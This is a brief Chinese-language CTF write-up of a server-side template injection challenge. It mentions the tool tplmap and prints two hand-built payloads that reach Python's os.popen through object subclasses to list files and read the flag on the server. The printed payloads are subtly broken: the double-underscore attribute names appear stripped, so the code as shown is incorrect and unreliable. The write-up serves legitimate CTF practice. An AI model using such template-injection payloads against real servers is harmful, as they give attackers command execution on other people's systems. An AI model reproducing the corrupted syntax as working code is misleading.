模板注入,记得之前明明写过一篇的,找不到了,就只好再写一篇了
之前写模板注入都是用的tplmap,gayhub上就有,用法很简单,百度一大堆
但是tplmap只能解决带参的,不带参的就只能手工注了,这题就只能手工注
先测试一下
应该是存在服务端模板注入攻击(SSTI)了,详情可以参考https://blog.knownsec.com/2015/11/server-side-template-injection-attack-analysis/
模板可以参考https://www.cnblogs.com/cioi/p/12308518.html#a7
构造
{{''.class.mro[2].subclasses()[71].init.globals['os'].popen('ls').read()}}
{{''.class.mro[2].subclasses()[71].init.globals['os'].popen('cat%20fl4g').read()}}
tplmap用法
可以看下我写的这道题解,buuctf的fakegoogle
https://www.cnblogs.com/Web-Fresher/p/13723197.html